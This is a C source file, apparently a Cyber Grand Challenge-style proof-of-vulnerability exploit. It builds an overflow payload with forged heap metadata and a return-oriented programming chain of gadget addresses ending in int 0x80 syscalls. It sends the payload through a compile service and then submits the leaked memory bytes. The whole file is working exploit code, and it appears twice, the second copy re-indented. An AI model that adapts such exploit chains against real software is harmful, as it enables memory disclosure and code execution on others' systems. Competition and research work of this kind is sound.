potetisensei/6.c

## 6.c
#include <pov.h>
#include <stdio.h>

unsigned int getrand() {
  unsigned int ret = 0x41414141;
  //int i;
  //for (i=0; i<4; i++) {
  //  ret *= 0x100;
  //  unsigned char c;
  //  random(&c, 1, NULL);
  //  ret += 0x80 + c % 0x80;
  //}
  return ret;
}

int exploit1() {
	type2_init();

  unsigned int payload_addr = 0xb7fff073;

  buf_t * dummy_table = buf_new();
  buf_p32(dummy_table, payload_addr+4);
  buf_p32(dummy_table, 0x080545b7); // retn 0x0BEB

  int A = -48;
  int B = -31;
  TYPE2_ADDR += 0x28;

  buf_t *payload = buf_new();
  buf_p32(payload, getrand() | 1);
  buf_p32(payload, 0xfffffff1);
  buf_p32(payload, getrand() | 1);
  buf_p32(payload, getrand() | 1);
  buf_p32(payload, 0xffffffe1);
  buf_p32(payload, 0x080c0481);
  buf_p32(payload, getrand() | 1);
  buf_p32(payload, getrand() | 1);
  buf_p32(payload, getrand() | 1);
  buf_p32(payload, getrand() | 1);
  buf_p32(payload, getrand() | 1);
  buf_p32(payload, getrand() | 1);
  buf_p32(payload, A);
  buf_p32(payload, B);
  buf_p32(payload, getrand() | 1);
  buf_p32(payload, getrand() | 1);
  buf_p32(payload, 0x80c0b11);
  buf_p32(payload, getrand() | 1);
  buf_p32(payload, getrand() | 1);
  buf_p32(payload, 0x80c0b31);
  buf_p32(payload, getrand() | 1);
  buf_p32(payload, getrand() | 1);
  buf_p32(payload, getrand() | 1);
  buf_p32(payload, getrand() | 1);
  buf_p32(payload, getrand() | 1);
  buf_p32(payload, 0xffffffff);
  buf_p32(payload, payload_addr);
  buf_p32(payload, 0xb7fdb0a0-8);

  buf_t *payload2 = buf_new();
  buf_p32(payload2, 0x0806f885); // pop esi ;  ret
  buf_p32(payload2, 0x080c0b31);

  buf_p32(payload2, 0x0806859e); // pop eax ; ret
  buf_p32(payload2, TYPE2_ADDR/2);
  buf_p32(payload2, 0x0806f885); // pop ecx ; ret
  buf_p32(payload2, TYPE2_ADDR - TYPE2_ADDR/2);
  buf_p32(payload2, 0x08049907); // add ecx, eax; destroy eax; add esp, 4; pop ebp ; ret
  buf_append_rand_pad(payload2, 'A', 'A', 4);
  buf_append_rand_pad(payload2, 'A', 'A', 4);

  buf_p32(payload2, 0x0806859e); // pop eax ; ret
  buf_p32(payload2, 0xf7f3f111); // 0xf7f3f111 + 0x080C0EF0 = 1
  buf_p32(payload2, 0x0809c034); // add eax, 0x080C0EF0 ; pop ebp ; ret  ;
  buf_append_rand_pad(payload2, 'A', 'A', 4);
  buf_p32(payload2, 0x08098f0e); // xchg eax, ebx ; ret

  buf_p32(payload2, 0x0809c11a); // xor eax, eax ; ret

  int i;
  for (i=0; i<TYPE2_LENGTH; i++) {
    buf_p32(payload2, 0x08058c09); // inc eax ; ret
  }
  buf_p32(payload2, 0x08087041); // xchg eax, edx ; ret
  buf_p32(payload2, 0x0809c11a); // xor eax, eax ; ret
  buf_p32(payload2, 0x08058c09); // inc eax ; ret
  buf_p32(payload2, 0x08058c09); // inc eax ; ret

  buf_p32(payload2, 0x0809c0e3); // int 0x80 ; pop ecx ; pop ebx ; ret
  buf_append_rand_pad(payload2, 'A', 'A', 4);
  buf_append_rand_pad(payload2, 'A', 'A', 4);

  buf_p32(payload2, 0x0809c11a); // xor eax, eax ; ret
  buf_p32(payload2, 0x08098f0e); // xchg eax, ebx ; ret
  buf_p32(payload2, 0x0809c11a); // xor eax, eax ; ret
  buf_p32(payload2, 0x08058c09); // inc eax ; ret
  buf_p32(payload2, 0x0809c0e3); // int 0x80 ; pop ecx ; pop ebx ; ret

  sendline("void func1 () {");

  buf_t *tmp = buf_new();
  buf_append(tmp, "    ");
  buf_append_rand_pad(tmp, 'A', 'A', 956);
  buf_append(tmp, ";\n");
  sendb(tmp);
  buf_delete(tmp);

  tmp = buf_new();
  buf_append(tmp, "  \"");
  buf_append_rand_pad(tmp, 'A', 'A', 256);
  buf_append(tmp, "\";\n");
  sendb(tmp);
  buf_delete(tmp);

  tmp = buf_new();
  buf_append(tmp, "  \"");
  buf_append_rand_pad(tmp, 'A', 'A', 0x28);
  buf_appendb_del(tmp, payload);
  buf_append_rand_pad(tmp, 'A', 'A', 0x68);
  buf_append(tmp, "\";\n");
  sendb(tmp);

  buf_delete(tmp);

  tmp = buf_new();
  buf_append(tmp, "  \"");
  buf_appendb_del(tmp, dummy_table);
  buf_append_rand_pad(tmp, 'A', 'A', 0x1dc);
  buf_appendb(tmp, payload2);
  buf_append_rand_pad(tmp, 'A', 'A', 0x31c-payload2->len);
  buf_append(tmp, "\";\n");
  sendb(tmp);

  buf_delete(tmp);
  sendline("}\n");
  sendline(">>COMPILE");

  skipuntil("line 2.\n");
  type2_submit((const unsigned char*)recvn(TYPE2_LENGTH), TYPE2_LENGTH);
	return 0;
}

int main()
{
	exploit1();
	return 0;
}
	#include <pov.h>
	#include <stdio.h>

	unsigned int getrand() {
	unsigned int ret = 0x41414141;
	//int i;
	//for (i=0; i<4; i++) {
	// ret *= 0x100;
	// unsigned char c;
	// random(&c, 1, NULL);
	// ret += 0x80 + c % 0x80;
	//}
	return ret;
	}

	int exploit1() {
	type2_init();

	unsigned int payload_addr = 0xb7fff073;

	buf_t * dummy_table = buf_new();
	buf_p32(dummy_table, payload_addr+4);
	buf_p32(dummy_table, 0x080545b7); // retn 0x0BEB

	int A = -48;
	int B = -31;
	TYPE2_ADDR += 0x28;

	buf_t *payload = buf_new();
	buf_p32(payload, getrand() \| 1);
	buf_p32(payload, 0xfffffff1);
	buf_p32(payload, getrand() \| 1);
	buf_p32(payload, getrand() \| 1);
	buf_p32(payload, 0xffffffe1);
	buf_p32(payload, 0x080c0481);
	buf_p32(payload, getrand() \| 1);
	buf_p32(payload, getrand() \| 1);
	buf_p32(payload, getrand() \| 1);
	buf_p32(payload, getrand() \| 1);
	buf_p32(payload, getrand() \| 1);
	buf_p32(payload, getrand() \| 1);
	buf_p32(payload, A);
	buf_p32(payload, B);
	buf_p32(payload, getrand() \| 1);
	buf_p32(payload, getrand() \| 1);
	buf_p32(payload, 0x80c0b11);
	buf_p32(payload, getrand() \| 1);
	buf_p32(payload, getrand() \| 1);
	buf_p32(payload, 0x80c0b31);
	buf_p32(payload, getrand() \| 1);
	buf_p32(payload, getrand() \| 1);
	buf_p32(payload, getrand() \| 1);
	buf_p32(payload, getrand() \| 1);
	buf_p32(payload, getrand() \| 1);
	buf_p32(payload, 0xffffffff);
	buf_p32(payload, payload_addr);
	buf_p32(payload, 0xb7fdb0a0-8);

	buf_t *payload2 = buf_new();
	buf_p32(payload2, 0x0806f885); // pop esi ; ret
	buf_p32(payload2, 0x080c0b31);

	buf_p32(payload2, 0x0806859e); // pop eax ; ret
	buf_p32(payload2, TYPE2_ADDR/2);
	buf_p32(payload2, 0x0806f885); // pop ecx ; ret
	buf_p32(payload2, TYPE2_ADDR - TYPE2_ADDR/2);
	buf_p32(payload2, 0x08049907); // add ecx, eax; destroy eax; add esp, 4; pop ebp ; ret
	buf_append_rand_pad(payload2, 'A', 'A', 4);
	buf_append_rand_pad(payload2, 'A', 'A', 4);

	buf_p32(payload2, 0x0806859e); // pop eax ; ret
	buf_p32(payload2, 0xf7f3f111); // 0xf7f3f111 + 0x080C0EF0 = 1
	buf_p32(payload2, 0x0809c034); // add eax, 0x080C0EF0 ; pop ebp ; ret ;
	buf_append_rand_pad(payload2, 'A', 'A', 4);
	buf_p32(payload2, 0x08098f0e); // xchg eax, ebx ; ret

	buf_p32(payload2, 0x0809c11a); // xor eax, eax ; ret

	int i;
	for (i=0; i<TYPE2_LENGTH; i++) {
	buf_p32(payload2, 0x08058c09); // inc eax ; ret
	}
	buf_p32(payload2, 0x08087041); // xchg eax, edx ; ret
	buf_p32(payload2, 0x0809c11a); // xor eax, eax ; ret
	buf_p32(payload2, 0x08058c09); // inc eax ; ret
	buf_p32(payload2, 0x08058c09); // inc eax ; ret

	buf_p32(payload2, 0x0809c0e3); // int 0x80 ; pop ecx ; pop ebx ; ret
	buf_append_rand_pad(payload2, 'A', 'A', 4);
	buf_append_rand_pad(payload2, 'A', 'A', 4);

	buf_p32(payload2, 0x0809c11a); // xor eax, eax ; ret
	buf_p32(payload2, 0x08098f0e); // xchg eax, ebx ; ret
	buf_p32(payload2, 0x0809c11a); // xor eax, eax ; ret
	buf_p32(payload2, 0x08058c09); // inc eax ; ret
	buf_p32(payload2, 0x0809c0e3); // int 0x80 ; pop ecx ; pop ebx ; ret

	sendline("void func1 () {");

	buf_t *tmp = buf_new();
	buf_append(tmp, " ");
	buf_append_rand_pad(tmp, 'A', 'A', 956);
	buf_append(tmp, ";\n");
	sendb(tmp);
	buf_delete(tmp);

	tmp = buf_new();
	buf_append(tmp, " \"");
	buf_append_rand_pad(tmp, 'A', 'A', 256);
	buf_append(tmp, "\";\n");
	sendb(tmp);
	buf_delete(tmp);

	tmp = buf_new();
	buf_append(tmp, " \"");
	buf_append_rand_pad(tmp, 'A', 'A', 0x28);
	buf_appendb_del(tmp, payload);
	buf_append_rand_pad(tmp, 'A', 'A', 0x68);
	buf_append(tmp, "\";\n");
	sendb(tmp);

	buf_delete(tmp);

	tmp = buf_new();
	buf_append(tmp, " \"");
	buf_appendb_del(tmp, dummy_table);
	buf_append_rand_pad(tmp, 'A', 'A', 0x1dc);
	buf_appendb(tmp, payload2);
	buf_append_rand_pad(tmp, 'A', 'A', 0x31c-payload2->len);
	buf_append(tmp, "\";\n");
	sendb(tmp);

	buf_delete(tmp);
	sendline("}\n");
	sendline(">>COMPILE");

	skipuntil("line 2.\n");
	type2_submit((const unsigned char*)recvn(TYPE2_LENGTH), TYPE2_LENGTH);
	return 0;
	}

	int main()
	{
	exploit1();
	return 0;
	}